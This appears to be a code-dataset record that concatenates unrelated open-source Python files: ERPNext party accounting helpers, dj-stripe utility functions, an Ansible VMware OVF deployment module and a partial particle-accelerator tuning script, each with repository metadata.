{"parenttype": party_type, "parent": party, "company": company}, "account")
if not account and party_type in ['Customer', 'Supplier']:
party_group_doctype = "Customer Group" if party_type=="Customer" else "Supplier Type"
group = frappe.db.get_value(party_type, party, scrub(party_group_doctype))
account = frappe.db.get_value("Party Account",
{"parenttype": party_group_doctype, "parent": group, "company": company}, "account")
if not account and party_type in ['Customer', 'Supplier']:
default_account_name = "default_receivable_account" \
if party_type=="Customer" else "default_payable_account"
account = frappe.db.get_value("Company", company, default_account_name)
existing_gle_currency = get_party_gle_currency(party_type, party, company)
if existing_gle_currency:
if account:
account_currency = frappe.db.get_value("Account", account, "account_currency")
if (account and account_currency != existing_gle_currency) or not account:
account = get_party_gle_account(party_type, party, company)
return account
def get_party_account_currency(party_type, party, company):
def generator():
party_account = get_party_account(party_type, party, company)
return frappe.db.get_value("Account", party_account, "account_currency")
return frappe.local_cache("party_account_currency", (party_type, party, company), generator)
def get_party_gle_currency(party_type, party, company):
def generator():
existing_gle_currency = frappe.db.sql("""select account_currency from `tabGL Entry`
where docstatus=1 and company=%(company)s and party_type=%(party_type)s and party=%(party)s
limit 1""", { "company": company, "party_type": party_type, "party": party })
return existing_gle_currency[0][0] if existing_gle_currency else None
return frappe.local_cache("party_gle_currency", (party_type, party, company), generator,
regenerate_if_none=True)
def get_party_gle_account(party_type, party, company):
def generator():
existing_gle_account = frappe.db.sql("""select account from `tabGL Entry`
where docstatus=1 and company=%(company)s and party_type=%(party_type)s and party=%(party)s
limit 1""", { "company": company, "party_type": party_type, "party": party })
return existing_gle_account[0][0] if existing_gle_account else None
return frappe.local_cache("party_gle_account", (party_type, party, company), generator,
regenerate_if_none=True)
def validate_party_gle_currency(party_type, party, company, party_account_currency=None):
"""Validate party account currency with existing GL Entry's currency"""
if not party_account_currency:
party_account_currency = get_party_account_currency(party_type, party, company)
existing_gle_currency = get_party_gle_currency(party_type, party, company)
if existing_gle_currency and party_account_currency != existing_gle_currency:
frappe.throw(_("Accounting Entry for {0}: {1} can only be made in currency: {2}")
.format(party_type, party, existing_gle_currency), InvalidAccountCurrency)
def validate_party_accounts(doc):
companies = []
for account in doc.get("accounts"):
if account.company in companies:
frappe.throw(_("There can only be 1 Account per Company in {0} {1}")
.format(doc.doctype, doc.name), DuplicatePartyAccountError)
else:
companies.append(account.company)
party_account_currency = frappe.db.get_value("Account", account.account, "account_currency")
existing_gle_currency = get_party_gle_currency(doc.doctype, doc.name, account.company)
company_default_currency = frappe.db.get_value("Company",
frappe.db.get_default("Company"), "default_currency", cache=True)
if existing_gle_currency and party_account_currency != existing_gle_currency:
frappe.throw(_("Accounting entries have already been made in currency {0} for company {1}. Please select a receivable or payable account with currency {0}.").format(existing_gle_currency, account.company))
if doc.get("default_currency") and party_account_currency and company_default_currency:
if doc.default_currency != party_account_currency and doc.default_currency != company_default_currency:
frappe.throw(_("Billing currency must be equal to either default comapany's currency or party account currency"))
@frappe.whitelist()
def get_due_date(posting_date, party_type, party, company):
"""Set Due Date = Posting Date + Credit Days"""
due_date = None
if posting_date and party:
due_date = posting_date
credit_days_based_on, credit_days = get_credit_days(party_type, party, company)
if credit_days_based_on == "Fixed Days" and credit_days:
due_date = add_days(posting_date, credit_days)
elif credit_days_based_on == "Last Day of the Next Month":
due_date = (get_first_day(posting_date, 0, 2) + datetime.timedelta(-1)).strftime("%Y-%m-%d")
return due_date
def get_credit_days(party_type, party, company):
credit_days = 0
if party_type and party:
if party_type == "Customer":
credit_days_based_on, credit_days, customer_group = \
frappe.db.get_value(party_type, party, ["credit_days_based_on", "credit_days", "customer_group"])
else:
credit_days_based_on, credit_days, supplier_type = \
frappe.db.get_value(party_type, party, ["credit_days_based_on", "credit_days", "supplier_type"])
if not credit_days_based_on:
if party_type == "Customer" and customer_group:
credit_days_based_on, credit_days = \
frappe.db.get_value("Customer Group", customer_group, ["credit_days_based_on", "credit_days"])
elif party_type == "Supplier" and supplier_type:
credit_days_based_on, credit_days = \
frappe.db.get_value("Supplier Type", supplier_type, ["credit_days_based_on", "credit_days"])
if not credit_days_based_on:
credit_days_based_on, credit_days = \
frappe.db.get_value("Company", company, ["credit_days_based_on", "credit_days"])
return credit_days_based_on, credit_days
def validate_due_date(posting_date, due_date, party_type, party, company):
if getdate(due_date) < getdate(posting_date):
frappe.throw(_("Due Date cannot be before Posting Date"))
else:
default_due_date = get_due_date(posting_date, party_type, party, company)
if not default_due_date:
return
if default_due_date != posting_date and getdate(due_date) > getdate(default_due_date):
is_credit_controller = frappe.db.get_single_value("Accounts Settings", "credit_controller") in frappe.get_roles()
if is_credit_controller:
msgprint(_("Note: Due / Reference Date exceeds allowed customer credit days by {0} day(s)")
.format(date_diff(due_date, default_due_date)))
else:
frappe.throw(_("Due / Reference Date cannot be after {0}").format(formatdate(default_due_date)))
@frappe.whitelist()
def set_taxes(party, party_type, posting_date, company, customer_group=None, supplier_type=None,
billing_address=None, shipping_address=None, use_for_shopping_cart=None):
from erpnext.accounts.doctype.tax_rule.tax_rule import get_tax_template, get_party_details
args = {
party_type.lower(): party,
"company": company
}
if customer_group:
args['customer_group'] = customer_group
if supplier_type:
args['supplier_type'] = supplier_type
if billing_address or shipping_address:
args.update(get_party_details(party, party_type, {"billing_address": billing_address, \
"shipping_address": shipping_address }))
else:
args.update(get_party_details(party, party_type))
if party_type in ("Customer", "Lead"):
args.update({"tax_type": "Sales"})
if party_type=='Lead':
args['customer'] = None
del args['lead']
else:
args.update({"tax_type": "Purchase"})
if use_for_shopping_cart:
args.update({"use_for_shopping_cart": use_for_shopping_cart})
return get_tax_template(posting_date, args)
def validate_party_frozen_disabled(party_type, party_name):
if party_type and party_name:
if party_type in ("Customer", "Supplier"):
party = frappe.db.get_value(party_type, party_name, ["is_frozen", "disabled"], as_dict=True)
if party.disabled:
frappe.throw(_("{0} {1} is disabled").format(party_type, party_name), PartyDisabled)
elif party.get("is_frozen"):
frozen_accounts_modifier = frappe.db.get_value( 'Accounts Settings', None,'frozen_accounts_modifier')
if not frozen_accounts_modifier in frappe.get_roles():
frappe.throw(_("{0} {1} is frozen").format(party_type, party_name), PartyFrozen)
elif party_type == "Employee":
if frappe.db.get_value("Employee", party_name, "status") == "Left":
frappe.msgprint(_("{0} {1} is not active").format(party_type, party_name), alert=True)
def get_timeline_data(doctype, name):
'''returns timeline data for the past one year'''
from frappe.desk.form.load import get_communication_data
out = {}
data = get_communication_data(doctype, name,
fields = 'date(creation), count(name)',
after = add_years(None, -1).strftime('%Y-%m-%d'),
group_by='group by date(creation)', as_dict=False)
timeline_items = dict(data)
for date, count in timeline_items.iteritems():
timestamp = get_timestamp(date)
out.update({ timestamp: count })
return out
def get_dashboard_info(party_type, party):
current_fiscal_year = get_fiscal_year(nowdate(), as_dict=True)
company = frappe.db.get_default("company") or frappe.get_all("Company")[0].name
party_account_currency = get_party_account_currency(party_type, party, company)
company_default_currency = get_default_currency() \
or frappe.db.get_value('Company', company, 'default_currency')
if party_account_currency==company_default_currency:
total_field = "base_grand_total"
else:
total_field = "grand_total"
doctype = "Sales Invoice" if party_type=="Customer" else "Purchase Invoice"
billing_this_year = frappe.db.sql("""
select sum({0})
from `tab{1}`
where {2}=%s and docstatus=1 and posting_date between %s and %s
""".format(total_field, doctype, party_type.lower()),
(party, current_fiscal_year.year_start_date, current_fiscal_year.year_end_date))
total_unpaid = frappe.db.sql("""
select sum(debit_in_account_currency) - sum(credit_in_account_currency)
from `tabGL Entry`
where party_type = %s and party=%s""", (party_type, party))
info = {}
info["billing_this_year"] = flt(billing_this_year[0][0]) if billing_this_year else 0
info["currency"] = party_account_currency
info["total_unpaid"] = flt(total_unpaid[0][0]) if total_unpaid else 0
if party_type == "Supplier":
info["total_unpaid"] = -1 * info["total_unpaid"]
return info
|
emmuchira/kps_erp
|
erpnext/accounts/party.py
|
Python
|
gpl-3.0
| 16,798 | 0.025063 |
# -*- coding: utf-8 -*-
"""
.. module:: djstripe.utils.
:synopsis: dj-stripe - Utility functions related to the djstripe app.
.. moduleauthor:: @kavdev, @pydanny, @wahuneke
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import ImproperlyConfigured
from django.db.models.query import QuerySet
from django.utils import timezone
ANONYMOUS_USER_ERROR_MSG = (
"dj-stripe's payment checking mechanisms require the user "
"be authenticated before use. Please use django.contrib.auth's "
"login_required decorator or a LoginRequiredMixin. "
"Please read the warning at "
"http://dj-stripe.readthedocs.org/en/latest/usage.html#ongoing-subscriptions."
)
def subscriber_has_active_subscription(subscriber, plan=None):
"""
Helper function to check if a subscriber has an active subscription.
Throws improperlyConfigured if the subscriber is an instance of AUTH_USER_MODEL
and get_user_model().is_anonymous == True.
Activate subscription rules (or):
* customer has active subscription
If the subscriber is an instance of AUTH_USER_MODEL, active subscription rules (or):
* customer has active subscription
* user.is_superuser
* user.is_staff
:param subscriber: The subscriber for which to check for an active subscription.
:type subscriber: dj-stripe subscriber
:param plan: The plan for which to check for an active subscription. If plan is None and
there exists only one subscription, this method will check if that subscription
is active. Calling this method with no plan and multiple subscriptions will throw
an exception.
:type plan: Plan or string (plan ID)
"""
if isinstance(subscriber, AnonymousUser):
raise ImproperlyConfigured(ANONYMOUS_USER_ERROR_MSG)
if isinstance(subscriber, get_user_model()):
if subscriber.is_superuser or subscriber.is_staff:
return True
from .models import Customer
customer, created = Customer.get_or_create(subscriber)
if created or not customer.has_active_subscription(plan):
return False
return True
def get_supported_currency_choices(api_key):
"""
Pull a stripe account's supported currencies and returns a choices tuple of those supported currencies.
:param api_key: The api key associated with the account from which to pull data.
:type api_key: str
"""
import stripe
stripe.api_key = api_key
account = stripe.Account.retrieve()
supported_payment_currencies = stripe.CountrySpec.retrieve(account["country"])["supported_payment_currencies"]
return [(currency, currency.upper()) for currency in supported_payment_currencies]
def dict_nested_accessor(d, name):
"""
Access a dictionary value, possibly in a nested dictionary.
>>> dict_nested_accessor({'id': 'joe'}, 'id')
"joe"
>>> dict_nested_accessor({'inner': {'id': 'joe'}}, 'inner.id')
"joe"
:type d: dict
"""
names = name.split(".", 1)
if len(names) > 1:
return dict_nested_accessor(d[names[0]], names[1])
else:
return d[name]
def clear_expired_idempotency_keys():
from .models import IdempotencyKey
threshold = timezone.now() - datetime.timedelta(hours=24)
IdempotencyKey.objects.filter(created__lt=threshold).delete()
def convert_tstamp(response):
"""
Convert a Stripe API timestamp response (unix epoch) to a native datetime.
:rtype: datetime
"""
if response is None:
# Allow passing None to convert_tstamp()
return response
# Overrides the set timezone to UTC - I think...
tz = timezone.utc if settings.USE_TZ else None
return datetime.datetime.fromtimestamp(response, tz)
# TODO: Finish this.
CURRENCY_SIGILS = {
"CAD": "$",
"EUR": "€",
"GBP": "£",
"USD": "$",
}
def get_friendly_currency_amount(amount, currency):
currency = currency.upper()
sigil = CURRENCY_SIGILS.get(currency, "")
return "{sigil}{amount} {currency}".format(sigil=sigil, amount=amount, currency=currency)
class QuerySetMock(QuerySet):
"""
A mocked QuerySet class that does not handle updates.
Used by UpcomingInvoice.invoiceitems.
"""
@classmethod
def from_iterable(cls, model, iterable):
instance = cls(model)
instance._result_cache = list(iterable)
instance._prefetch_done = True
return instance
def _clone(self):
return self.__class__.from_iterable(self.model, self._result_cache)
def update(self):
return 0
def delete(self):
return 0
|
jameshiew/dj-stripe
|
djstripe/utils.py
|
Python
|
mit
| 4,844 | 0.002685 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Matt Martz <matt@sivel.net>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
author: 'Matt Martz (@sivel)'
short_description: 'Deploys a VMware virtual machine from an OVF or OVA file'
description:
- 'This module can be used to deploy a VMware VM from an OVF or OVA file'
module: vmware_deploy_ovf
notes: []
options:
allow_duplicates:
default: "yes"
description:
- Whether or not to allow duplicate VM names. ESXi allows duplicates, vCenter may not.
type: bool
datacenter:
default: ha-datacenter
description:
- Datacenter to deploy to.
type: str
cluster:
description:
- Cluster to deploy to.
type: str
datastore:
default: datastore1
description:
- Datastore to deploy to.
- "You can also specify datastore storage cluster. version_added: 2.9"
type: str
deployment_option:
description:
- The key of the chosen deployment option.
type: str
disk_provisioning:
choices:
- flat
- eagerZeroedThick
- monolithicSparse
- twoGbMaxExtentSparse
- twoGbMaxExtentFlat
- thin
- sparse
- thick
- seSparse
- monolithicFlat
default: thin
description:
- Disk provisioning type.
type: str
fail_on_spec_warnings:
description:
- Cause the module to treat OVF Import Spec warnings as errors.
default: "no"
type: bool
folder:
description:
- Absolute path of folder to place the virtual machine.
- If not specified, defaults to the value of C(datacenter.vmFolder).
- 'Examples:'
- ' folder: /ha-datacenter/vm'
- ' folder: ha-datacenter/vm'
- ' folder: /datacenter1/vm'
- ' folder: datacenter1/vm'
- ' folder: /datacenter1/vm/folder1'
- ' folder: datacenter1/vm/folder1'
- ' folder: /folder1/datacenter1/vm'
- ' folder: folder1/datacenter1/vm'
- ' folder: /folder1/datacenter1/vm/folder2'
type: str
inject_ovf_env:
description:
- Force the given properties to be inserted into an OVF Environment and injected through VMware Tools.
version_added: "2.8"
type: bool
name:
description:
- Name of the VM to work with.
- Virtual machine names in vCenter are not necessarily unique, which may be problematic.
type: str
networks:
default:
VM Network: VM Network
description:
- 'C(key: value) mapping of OVF network name, to the vCenter network name.'
type: dict
ovf:
description:
- 'Path to OVF or OVA file to deploy.'
aliases:
- ova
power_on:
default: true
description:
- 'Whether or not to power on the virtual machine after creation.'
type: bool
properties:
description:
- The assignment of values to the properties found in the OVF as key value pairs.
type: dict
resource_pool:
default: Resources
description:
- Resource Pool to deploy to.
type: str
wait:
default: true
description:
- 'Wait for the host to power on.'
type: bool
wait_for_ip_address:
default: false
description:
- Wait until vCenter detects an IP address for the VM.
- This requires vmware-tools (vmtoolsd) to properly work after creation.
type: bool
requirements:
- pyvmomi
version_added: "2.7"
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- vmware_deploy_ovf:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
ovf: /path/to/ubuntu-16.04-amd64.ovf
wait_for_ip_address: true
delegate_to: localhost
# Deploys a new VM named 'NewVM' in specific datacenter/cluster, with network mapping taken from variable and using ova template from an absolute path
- vmware_deploy_ovf:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter: Datacenter1
cluster: Cluster1
datastore: vsandatastore
name: NewVM
networks: "{u'VM Network':u'{{ ProvisioningNetworkLabel }}'}"
validate_certs: no
power_on: no
ovf: /absolute/path/to/template/mytemplate.ova
delegate_to: localhost
'''
RETURN = r'''
instance:
description: metadata about the new virtual machine
returned: always
type: dict
sample: None
'''
import io
import os
import sys
import tarfile
import time
import traceback
import xml.etree.ElementTree as ET
from threading import Thread
from ansible.module_utils._text import to_native
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import string_types
from ansible.module_utils.urls import generic_urlparse, open_url, urlparse, urlunparse
from ansible.module_utils.vmware import (find_network_by_name, find_vm_by_name, PyVmomi,
gather_vm_facts, vmware_argument_spec, wait_for_task, wait_for_vm_ip)
try:
from ansible.module_utils.vmware import vim
from pyVmomi import vmodl
except ImportError:
pass
def path_exists(value):
if not isinstance(value, string_types):
value = str(value)
value = os.path.expanduser(os.path.expandvars(value))
if not os.path.exists(value):
raise ValueError('%s is not a valid path' % value)
return value
class ProgressReader(io.FileIO):
def __init__(self, name, mode='r', closefd=True):
self.bytes_read = 0
io.FileIO.__init__(self, name, mode=mode, closefd=closefd)
def read(self, size=10240):
chunk = io.FileIO.read(self, size)
self.bytes_read += len(chunk)
return chunk
class TarFileProgressReader(tarfile.ExFileObject):
def __init__(self, *args):
self.bytes_read = 0
tarfile.ExFileObject.__init__(self, *args)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.close()
except Exception:
pass
def read(self, size=10240):
chunk = tarfile.ExFileObject.read(self, size)
self.bytes_read += len(chunk)
return chunk
class VMDKUploader(Thread):
def __init__(self, vmdk, url, validate_certs=True, tarinfo=None, create=False):
Thread.__init__(self)
self.vmdk = vmdk
if tarinfo:
self.size = tarinfo.size
else:
self.size = os.stat(vmdk).st_size
self.url = url
self.validate_certs = validate_certs
self.tarinfo = tarinfo
self.f = None
self.e = None
self._create = create
@property
def bytes_read(self):
try:
return self.f.bytes_read
except AttributeError:
return 0
def _request_opts(self):
'''
Requests for vmdk files differ from other file types. Build the request options here to handle that
'''
headers = {
'Content-Length': self.size,
'Content-Type': 'application/octet-stream',
}
if self._create:
# Non-VMDK
method = 'PUT'
headers['Overwrite'] = 't'
else:
# VMDK
method = 'POST'
headers['Content-Type'] = 'application/x-vnd.vmware-streamVmdk'
return {
'method': method,
'headers': headers,
}
def _open_url(self):
open_url(self.url, data=self.f, validate_certs=self.validate_certs, **self._request_opts())
def run(self):
if self.tarinfo:
try:
with TarFileProgressReader(self.vmdk, self.tarinfo) as self.f:
self._open_url()
except Exception:
self.e = sys.exc_info()
else:
try:
with ProgressReader(self.vmdk, 'rb') as self.f:
self._open_url()
except Exception:
self.e = sys.exc_info()
class VMwareDeployOvf(PyVmomi):
def __init__(self, module):
super(VMwareDeployOvf, self).__init__(module)
self.module = module
self.params = module.params
self.datastore = None
self.datacenter = None
self.resource_pool = None
self.network_mappings = []
self.ovf_descriptor = None
self.tar = None
self.lease = None
self.import_spec = None
self.entity = None
def get_objects(self):
self.datacenter = self.find_datacenter_by_name(self.params['datacenter'])
if not self.datacenter:
self.module.fail_json(msg='%(datacenter)s could not be located' % self.params)
self.datastore = None
datastore_cluster_obj = self.find_datastore_cluster_by_name(self.params['datastore'])
if datastore_cluster_obj:
datastore = None
datastore_freespace = 0
for ds in datastore_cluster_obj.childEntity:
if isinstance(ds, vim.Datastore) and ds.summary.freeSpace > datastore_freespace:
# If datastore field is provided, filter destination datastores
if ds.summary.maintenanceMode != 'normal' or not ds.summary.accessible:
continue
datastore = ds
datastore_freespace = ds.summary.freeSpace
if datastore:
self.datastore = datastore
else:
self.datastore = self.find_datastore_by_name(self.params['datastore'], self.datacenter)
if not self.datastore:
self.module.fail_json(msg='%(datastore)s could not be located' % self.params)
if self.params['cluster']:
resource_pools = []
cluster = self.find_cluster_by_name(self.params['cluster'], datacenter_name=self.datacenter)
if cluster is None:
self.module.fail_json(msg="Unable to find cluster '%(cluster)s'" % self.params)
self.resource_pool = self.find_resource_pool_by_cluster(self.params['resource_pool'], cluster=cluster)
else:
self.resource_pool = self.find_resource_pool_by_name(self.params['resource_pool'])
if not self.resource_pool:
self.module.fail_json(msg='%(resource_pool)s could not be located' % self.params)
for key, value in self.params['networks'].items():
network = find_network_by_name(self.content, value)
if not network:
self.module.fail_json(msg='%(network)s could not be located' % self.params)
network_mapping = vim.OvfManager.NetworkMapping()
network_mapping.name = key
network_mapping.network = network
self.network_mappings.append(network_mapping)
return self.datastore, self.datacenter, self.resource_pool, self.network_mappings
def get_ovf_descriptor(self):
if tarfile.is_tarfile(self.params['ovf']):
self.tar = tarfile.open(self.params['ovf'])
ovf = None
for candidate in self.tar.getmembers():
dummy, ext = os.path.splitext(candidate.name)
if ext.lower() == '.ovf':
ovf = candidate
break
if not ovf:
self.module.fail_json(msg='Could not locate OVF file in %(ovf)s' % self.params)
self.ovf_descriptor = to_native(self.tar.extractfile(ovf).read())
else:
with open(self.params['ovf']) as f:
self.ovf_descriptor = f.read()
return self.ovf_descriptor
def get_lease(self):
datastore, datacenter, resource_pool, network_mappings = self.get_objects()
params = {
'diskProvisioning': self.params['disk_provisioning'],
}
if self.params['name']:
params['entityName'] = self.params['name']
if network_mappings:
params['networkMapping'] = network_mappings
if self.params['deployment_option']:
params['deploymentOption'] = self.params['deployment_option']
if self.params['properties']:
params['propertyMapping'] = []
for key, value in self.params['properties'].items():
property_mapping = vim.KeyValue()
property_mapping.key = key
property_mapping.value = str(value) if isinstance(value, bool) else value
params['propertyMapping'].append(property_mapping)
if self.params['folder']:
folder = self.content.searchIndex.FindByInventoryPath(self.params['folder'])
if not folder:
self.module.fail_json(msg="Unable to find the specified folder %(folder)s" % self.params)
else:
folder = datacenter.vmFolder
spec_params = vim.OvfManager.CreateImportSpecParams(**params)
ovf_descriptor = self.get_ovf_descriptor()
self.import_spec = self.content.ovfManager.CreateImportSpec(
ovf_descriptor,
resource_pool,
datastore,
spec_params
)
errors = [to_native(e.msg) for e in getattr(self.import_spec, 'error', [])]
if self.params['fail_on_spec_warnings']:
errors.extend(
(to_native(w.msg) for w in getattr(self.import_spec, 'warning', []))
)
if errors:
self.module.fail_json(
msg='Failure validating OVF import spec: %s' % '. '.join(errors)
)
for warning in getattr(self.import_spec, 'warning', []):
self.module.warn('Problem validating OVF import spec: %s' % to_native(warning.msg))
if not self.params['allow_duplicates']:
name = self.import_spec.importSpec.configSpec.name
match = find_vm_by_name(self.content, name, folder=folder)
if match:
self.module.exit_json(instance=gather_vm_facts(self.content, match), changed=False)
if self.module.check_mode:
self.module.exit_json(changed=True, instance={'hw_name': name})
try:
self.lease = resource_pool.ImportVApp(
self.import_spec.importSpec,
folder
)
except vmodl.fault.SystemError as e:
self.module.fail_json(
msg='Failed to start import: %s' % to_native(e.msg)
)
while self.lease.state != vim.HttpNfcLease.State.ready:
time.sleep(0.1)
self.entity = self.lease.info.entity
return self.lease, self.import_spec
def _normalize_url(self, url):
'''
The hostname in URLs from vmware may be ``*`` update it accordingly
'''
url_parts = generic_urlparse(urlparse(url))
if url_parts.hostname == '*':
if url_parts.port:
url_parts.netloc = '%s:%d' % (self.params['hostname'], url_parts.port)
else:
url_parts.netloc = self.params['hostname']
return urlunparse(url_parts.as_list())
def upload(self):
if self.params['ovf'] is None:
self.module.fail_json(msg="OVF path is required for upload operation.")
ovf_dir = os.path.dirname(self.params['ovf'])
lease, import_spec = self.get_lease()
uploaders = []
for file_item in import_spec.fileItem:
device_upload_url = None
for device_url in lease.info.deviceUrl:
if file_item.deviceId == device_url.importKey:
device_upload_url = self._normalize_url(device_url.url)
break
if not device_upload_url:
lease.HttpNfcLeaseAbort(
vmodl.fault.SystemError(reason='Failed to find deviceUrl for file %s' % file_item.path)
)
self.module.fail_json(
msg='Failed to find deviceUrl for file %s' % file_item.path
)
vmdk_tarinfo = None
if self.tar:
vmdk = self.tar
try:
vmdk_tarinfo = self.tar.getmember(file_item.path)
except KeyError:
lease.HttpNfcLeaseAbort(
vmodl.fault.SystemError(reason='Failed to find VMDK file %s in OVA' % file_item.path)
)
self.module.fail_json(
msg='Failed to find VMDK file %s in OVA' % file_item.path
)
else:
vmdk = os.path.join(ovf_dir, file_item.path)
try:
path_exists(vmdk)
except ValueError:
lease.HttpNfcLeaseAbort(
vmodl.fault.SystemError(reason='Failed to find VMDK file at %s' % vmdk)
)
self.module.fail_json(
msg='Failed to find VMDK file at %s' % vmdk
)
uploaders.append(
VMDKUploader(
vmdk,
device_upload_url,
self.params['validate_certs'],
tarinfo=vmdk_tarinfo,
create=file_item.create
)
)
total_size = sum(u.size for u in uploaders)
total_bytes_read = [0] * len(uploaders)
for i, uploader in enumerate(uploaders):
uploader.start()
while uploader.is_alive():
time.sleep(0.1)
total_bytes_read[i] = uploader.bytes_read
lease.HttpNfcLeaseProgress(int(100.0 * sum(total_bytes_read) / total_size))
if uploader.e:
lease.HttpNfcLeaseAbort(
vmodl.fault.SystemError(reason='%s' % to_native(uploader.e[1]))
)
self.module.fail_json(
msg='%s' % to_native(uploader.e[1]),
exception=''.join(traceback.format_tb(uploader.e[2]))
)
def complete(self):
self.lease.HttpNfcLeaseComplete()
def inject_ovf_env(self):
attrib = {
'xmlns': 'http://schemas.dmtf.org/ovf/environment/1',
'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance',
'xmlns:oe': 'http://schemas.dmtf.org/ovf/environment/1',
'xmlns:ve': 'http://www.vmware.com/schema/ovfenv',
'oe:id': '',
've:esxId': self.entity._moId
}
env = ET.Element('Environment', **attrib)
platform = ET.SubElement(env, 'PlatformSection')
ET.SubElement(platform, 'Kind').text = self.content.about.name
ET.SubElement(platform, 'Version').text = self.content.about.version
ET.SubElement(platform, 'Vendor').text = self.content.about.vendor
ET.SubElement(platform, 'Locale').text = 'US'
prop_section = ET.SubElement(env, 'PropertySection')
for key, value in self.params['properties'].items():
params = {
'oe:key': key,
'oe:value': str(value) if isinstance(value, bool) else value
}
ET.SubElement(prop_section, 'Property', **params)
opt = vim.option.OptionValue()
opt.key = 'guestinfo.ovfEnv'
opt.value = '<?xml version="1.0" encoding="UTF-8"?>' + to_native(ET.tostring(env))
config_spec = vim.vm.ConfigSpec()
config_spec.extraConfig = [opt]
task = self.entity.ReconfigVM_Task(config_spec)
wait_for_task(task)
def deploy(self):
facts = {}
if self.params['inject_ovf_env']:
self.inject_ovf_env()
if self.params['power_on']:
task = self.entity.PowerOn()
if self.params['wait']:
wait_for_task(task)
if self.params['wait_for_ip_address']:
_facts = wait_for_vm_ip(self.content, self.entity)
if not _facts:
self.module.fail_json(msg='Waiting for IP address timed out')
facts.update(_facts)
if not facts:
facts.update(gather_vm_facts(self.content, self.entity))
return facts
def main():
argument_spec = vmware_argument_spec()
argument_spec.update({
'name': {},
'datastore': {
'default': 'datastore1',
},
'datacenter': {
'default': 'ha-datacenter',
},
'cluster': {
'default': None,
},
'deployment_option': {
'default': None,
},
'folder': {
'default': None,
},
'inject_ovf_env': {
'default': False,
'type': 'bool',
},
'resource_pool': {
'default': 'Resources',
},
'networks': {
'default': {
'VM Network': 'VM Network',
},
'type': 'dict',
},
'ovf': {
'type': path_exists,
'aliases': ['ova'],
},
'disk_provisioning': {
'choices': [
'flat',
'eagerZeroedThick',
'monolithicSparse',
'twoGbMaxExtentSparse',
'twoGbMaxExtentFlat',
'thin',
'sparse',
'thick',
'seSparse',
'monolithicFlat'
],
'default': 'thin',
},
'power_on': {
'type': 'bool',
'default': True,
},
'properties': {
'type': 'dict',
},
'wait': {
'type': 'bool',
'default': True,
},
'wait_for_ip_address': {
'type': 'bool',
'default': False,
},
'allow_duplicates': {
'type': 'bool',
'default': True,
},
'fail_on_spec_warnings': {
'type': 'bool',
'default': False,
},
})
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
deploy_ovf = VMwareDeployOvf(module)
deploy_ovf.upload()
deploy_ovf.complete()
facts = deploy_ovf.deploy()
module.exit_json(instance=facts, changed=True)
if __name__ == '__main__':
main()
|
roadmapper/ansible
|
lib/ansible/modules/cloud/vmware/vmware_deploy_ovf.py
|
Python
|
gpl-3.0
| 22,956 | 0.002701 |
'''
main tuning script, LCLS
'''
import numpy as np
from ocelot.mint.mint import Optimizer, Action
from ocelot.mint.flash1_interface import FLASH1MachineInterface, FLASH1DeviceProperties, TestInterface
mi = FLASH1MachineInterface()
dp = FLASH1DeviceProperties()
#opt = Optimizer(mi, dp)
opt = Optimizer(TestInterface(), dp)
opt.debug = True
opt.logging = True
opt.log_file = 'test.log'
opt.timeout = 1.2
seq1 = [Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'simplex'] ) ]
seq2 = [Action(func=opt.max_sase, args=[ ['V14SMATCH','V7SMATCH'], 'simplex' ] )]
seq3 = [Action(func=opt.max_sase, args=[ ['V14SMATCH','V7SMATCH','H10SMATCH','H12SMATCH'], 'simplex' ] )]
seq4 = [Action(func=opt.max_sase, args=[ ['Q13SMATCH','Q15SMATCH'], 'simplex' ] )]
seq5 = [Action(func=opt.max_sase, args=[ ['H3DBC3','V3DBC3'], 'simplex' ] )]
seq6 = [Action(func=opt.max_sase, args=[ ['H3DBC3','V3DBC3','H10ACC7','V10ACC7'], 'simplex' ] )]
seq7 = [Action(func=opt.max_sase, args=[ ['Q5UND1.3.5','Q5UND2.4'], 'simplex' ] )]
seq8 = [Action(func=opt.max_sase, args=[ ['H3UND1','H3UND3','H3UND4','H3UND5'], 'simplex' ] )]
seq9 = [Action(func=opt.max_sase, args=[ ['H8TCOL','V8TCOL'], 'simplex' ] )]
seq10 = [Action(func=opt.max_sase, args=[ ['H3DBC3'], 'simplex' ] )]
seq0 = [Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'cg', {'maxiter':15}] ),
Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'simplex', {'maxiter':25}] )]
opt.eval(seq1)
"""
#import json
def get_dict(lat, bpms):
dict_bpms = {}
for elem in lat.sequence:
if elem.type == "monitor" and elem.mi_id in bpms:
dict_bpms[elem.mi_id] = {}
dict_bpms[elem.mi_id]["x"] = elem.x
dict_bpms[elem.mi_id]["y"] = elem.y
return dict_bpms
#dp = FLASH1DeviceProperties()
def apply_bump(names, currents, dIs, alpha):
mi.set_value(names, currents+dIs*alpha)
cors = ['H3DBC3', 'H10ACC4','H9ACC5', 'H10ACC5', 'H9ACC6', 'H10ACC6', 'H10ACC7']
dI = np.array([-0.0114768844711, -0.183727960466, 0.325959042831, 0.318743893708, 0.15280311903, 0.130996600233, -0.831909116508])
currents = np.array([ -0.0229914523661, 0.0250000003725, 0.985000014305, 0.0, -1.17299997807, 0.0, 0.148000001907])
bump = {"correctors":cors, "dI": dI, "currents":currents}
alpha = 0.1
seq_bump = [Action(func=opt.max_sase_bump, args=[ bump, alpha, 'simplex' ] )]
orbit = {}
